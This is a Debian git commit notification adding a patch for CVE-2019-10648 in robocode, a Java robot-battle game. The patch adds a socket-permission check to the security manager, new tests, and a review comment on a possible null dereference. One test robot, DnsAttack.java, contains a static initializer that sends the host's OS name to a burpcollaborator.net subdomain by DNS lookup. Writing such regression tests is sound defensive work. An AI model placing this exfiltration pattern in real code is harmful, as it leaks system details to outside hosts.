[Git][java-team/robocode][master] 2 commits: Fix CVE-2019-10648
Markus Koschany
gitlab at salsa.debian.org
Sun Apr 7 23:22:32 BST 2019
Markus Koschany pushed to branch master at Debian Java Maintainers / robocode
Commits:
3a31c759 by Markus Koschany at 2019-04-07T22:11:50Z
Fix CVE-2019-10648
- - - - -
466142c3 by Markus Koschany at 2019-04-07T22:13:55Z
Update changelog
- - - - -
3 changed files:
- debian/changelog
- + debian/patches/CVE-2019-10648.patch
- debian/patches/series
Changes:
=====================================
debian/changelog
=====================================
@@ -1,3 +1,13 @@
+robocode (1.9.3.3-2) unstable; urgency=medium
+
+ * Fix CVE-2019-10648:
+ Robocode allows remote attackers to cause external service interaction
+ (DNS), as demonstrated by a query for a unique subdomain name within an
+ attacker-controlled DNS zone, because of a .openStream call within
+ java.net.URL. (Closes: #926088)
+
+ -- Markus Koschany <apo at debian.org> Mon, 08 Apr 2019 00:13:19 +0200
+
robocode (1.9.3.3-1) unstable; urgency=medium
* New upstream version 1.9.3.3.
=====================================
debian/patches/CVE-2019-10648.patch
=====================================
@@ -0,0 +1,235 @@
+From: Markus Koschany <apo at debian.org>
+Date: Mon, 8 Apr 2019 00:11:33 +0200
+Subject: CVE-2019-10648
+
+Bug-Debian: https://bugs.debian.org/926088
+Origin: https://github.com/robo-code/robocode/commit/836c84635e982e74f2f2771b2c8640c3a34221bd
+---
+ .../host/security/RobocodeSecurityManager.java | 26 ++++++++++--
+ .../src/main/java/tested/robots/DnsAttack.java | 18 +++++++++
+ .../test/robots/TestConstructorHttpAttack.java | 11 +++---
+ .../sf/robocode/test/robots/TestHttpAttack.java | 11 +++---
+ .../robots/TestStaticConstructorDnsAttack.java | 46 ++++++++++++++++++++++
+ 5 files changed, 96 insertions(+), 16 deletions(-)
+ create mode 100644 robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java
+ create mode 100644 robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
+
+diff --git a/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java b/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
+index bc4c85a..ebd23e9 100644
+--- a/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
++++ b/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java
+@@ -12,7 +12,9 @@ import net.sf.robocode.host.IHostedThread;
+ import net.sf.robocode.host.IThreadManager;
+ import net.sf.robocode.io.RobocodeProperties;
+
++import java.net.SocketPermission;
+ import java.security.AccessControlException;
++import java.security.Permission;
+
+
+ /**
+@@ -49,7 +51,6 @@ public class RobocodeSecurityManager extends SecurityManager {
+ }
+
+ Thread c = Thread.currentThread();
+-
+ if (isSafeThread(c)) {
+ return;
+ }
+@@ -84,7 +85,7 @@ public class RobocodeSecurityManager extends SecurityManager {
+ if (robotProxy != null) {
+ robotProxy.punishSecurityViolation(message);
+ }
+- throw new AccessControlException(message);
++ throw new SecurityException(message);
+ }
+ }
+
+@@ -94,7 +95,6 @@ public class RobocodeSecurityManager extends SecurityManager {
+ return;
+ }
+ Thread c = Thread.currentThread();
+-
+ if (isSafeThread(c)) {
+ return;
+ }
+@@ -123,9 +123,27 @@ public class RobocodeSecurityManager extends SecurityManager {
+ String message = "Robots are only allowed to create up to 5 threads!";
+
+ robotProxy.punishSecurityViolation(message);
+- throw new AccessControlException(message);
++ throw new SecurityException(message);
+ }
+ }
++
++ public void checkPermission(Permission perm) {
++ if (RobocodeProperties.isSecurityOff()) {
++ return;
++ }
++ Thread c = Thread.currentThread();
++ if (isSafeThread(c)) {
++ return;
++ }
++ super.checkPermission(perm);
++
++ if (perm instanceof SocketPermission) {
++ IHostedThread robotProxy = threadManager.getLoadedOrLoadingRobotProxy(c);
++ String message = "Using socket is not allowed";
++ robotProxy.punishSecurityViolation(message);
++ throw new SecurityException(message);
++ }
++ }
+
+ private boolean isSafeThread(Thread c) {
+ return threadManager.isSafeThread(c);
+diff --git a/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java b/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java
+new file mode 100644
+index 0000000..701e5d8
+--- /dev/null
++++ b/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java
+@@ -0,0 +1,18 @@
++package tested.robots;
++
++public class DnsAttack extends robocode.Robot {
++ static {
++ try {
++ new java.net.URL("http://" + System.getProperty("os.name").replaceAll(" ", ".")
++ + ".randomsubdomain.burpcollaborator.net").openStream();
++ } catch (Exception e) {
++ }
++ }
++
++ public void run() {
++ for (;;) {
++ ahead(100);
++ back(100);
++ }
++ }
++}
+diff --git a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
+index 8d7b1d7..7930237 100755
+--- a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
++++ b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java
+@@ -19,7 +19,7 @@ import robocode.control.events.TurnEndedEvent;
+ public class TestConstructorHttpAttack extends RobocodeTestBed {
+
+ private boolean messagedInitialization;
+- private boolean messagedAccessDenied;
++ private boolean securityExceptionOccurred;
+
+ @Override
+ public String getRobotNames() {
+@@ -36,20 +36,19 @@ public class TestConstructorHttpAttack extends RobocodeTestBed {
+ messagedInitialization = true;
+ }
+
+- if (out.contains("access denied (java.net.SocketPermission")
+- || out.contains("access denied (\"java.net.SocketPermission\"")) {
+- messagedAccessDenied = true;
++ if (out.contains("java.lang.SecurityException:")) {
++ securityExceptionOccurred = true;
+ }
+ }
+
+ @Override
+ protected void runTeardown() {
+ Assert.assertTrue("Error during initialization", messagedInitialization);
+- Assert.assertTrue("HTTP connection is not allowed", messagedAccessDenied);
++ Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred);
+ }
+
+ @Override
+ protected int getExpectedErrors() {
+- return hasJavaNetURLPermission ? 3 : 2; // Security error must be reported as an error
++ return 2;
+ }
+ }
+diff --git a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java
+index 770fb49..06d3bcb 100755
+--- a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java
++++ b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java
+@@ -18,7 +18,7 @@ import robocode.control.events.TurnEndedEvent;
+ */
+ public class TestHttpAttack extends RobocodeTestBed {
+
+- private boolean messagedAccessDenied;
++ private boolean securityExceptionOccurred;
+
+ @Override
+ public String getRobotNames() {
+@@ -31,19 +31,18 @@ public class TestHttpAttack extends RobocodeTestBed {
+
+ final String out = event.getTurnSnapshot().getRobots()[0].getOutputStreamSnapshot();
+
+- if (out.contains("access denied (java.net.SocketPermission")
+- || out.contains("access denied (\"java.net.SocketPermission\"")) {
+- messagedAccessDenied = true;
++ if (out.contains("java.lang.SecurityException:")) {
++ securityExceptionOccurred = true;
+ }
+ }
+
+ @Override
+ protected void runTeardown() {
+- Assert.assertTrue("HTTP connection is not allowed", messagedAccessDenied);
++ Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred);
+ }
+
+ @Override
+ protected int getExpectedErrors() {
+- return hasJavaNetURLPermission ? 2 : 1; // Security error must be reported as an error. Java 8 reports two errors.
++ return 1;
+ }
+ }
+diff --git a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
+new file mode 100644
+index 0000000..bf62373
+--- /dev/null
++++ b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java
+@@ -0,0 +1,46 @@
++/**
++ * Copyright (c) 2001-2019 Mathew A. Nelson and Robocode contributors
++ * All rights reserved. This program and the accompanying materials
++ * are made available under the terms of the Eclipse Public License v1.0
++ * which accompanies this distribution, and is available at
++ * https://robocode.sourceforge.io/license/epl-v10.html
++ */
++package net.sf.robocode.test.robots;
++
++import net.sf.robocode.test.helpers.RobocodeTestBed;
++import org.junit.Assert;
++import robocode.control.events.TurnEndedEvent;
++
++/**
++ * @author Flemming N. Larsen (original)
++ */
++public class TestStaticConstructorDnsAttack extends RobocodeTestBed {
++
++ private boolean securityExceptionOccurred;
++
++ @Override
++ public String getRobotNames() {
++ return "tested.robots.DnsAttack,sample.Target";
++ }
++
++ @Override
++ public void onTurnEnded(TurnEndedEvent event) {
++ super.onTurnEnded(event);
++
++ final String out = event.getTurnSnapshot().getRobots()[0].getOutputStreamSnapshot();
++
++ if (out.contains("SYSTEM: Using socket is not allowed")) {
++ securityExceptionOccurred = true;
++ }
++ }
++
++ @Override
++ protected void runTeardown() {
++ Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred);
++ }
++
++ @Override
++ protected int getExpectedErrors() {
++ return 1;
++ }
++}
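Review bot: The added `checkPermission(Permission perm)` in RobocodeSecurityManager calls `robotProxy.punishSecurityViolation(message)` without checking the proxy for null, although the `checkAccess` hunk earlier in the same patch guards the identical `threadManager.getLoadedOrLoadingRobotProxy(c)` lookup with `if (robotProxy != null)`. If that lookup returns null for a thread that is neither safe nor a loaded robot, the socket attempt ends in a NullPointerException rather than the intended SecurityException, and no violation is recorded. Mirror the existing guard: `if (robotProxy != null) { robotProxy.punishSecurityViolation(message); }` before `throw new SecurityException(message);`, and mark the method `@Override` so the compiler confirms it replaces `SecurityManager.checkPermission(Permission)`. Since `super.checkPermission(perm)` runs before the SocketPermission branch, a policy that already denies the permission would raise AccessControlException first and skip the punishment; whether that can happen depends on the Robocode policy, which is outside this hunk.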
=====================================
debian/patches/series
=====================================
@@ -1,3 +1,4 @@
showJavaDocumentation.patch
maven-assembly.patch
ecj.patch
+CVE-2019-10648.patch